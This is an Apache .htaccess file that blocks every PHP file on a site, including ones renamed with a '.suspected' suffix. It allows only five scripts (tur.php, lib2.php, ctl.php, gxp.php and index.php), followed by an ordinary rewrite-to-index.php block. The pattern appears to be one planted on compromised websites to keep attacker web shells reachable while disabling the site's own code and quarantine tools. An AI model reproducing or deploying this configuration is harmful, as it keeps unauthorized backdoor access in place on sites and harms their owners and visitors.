<FilesMatch ".*\.(phtml|php|PhP|php5|suspected|Phtml|Php|pHp|php7|PHP)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(tur.php|lib2.php|ctl.php|gxp.php|index.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule . /index.php [L]
</IfModule>
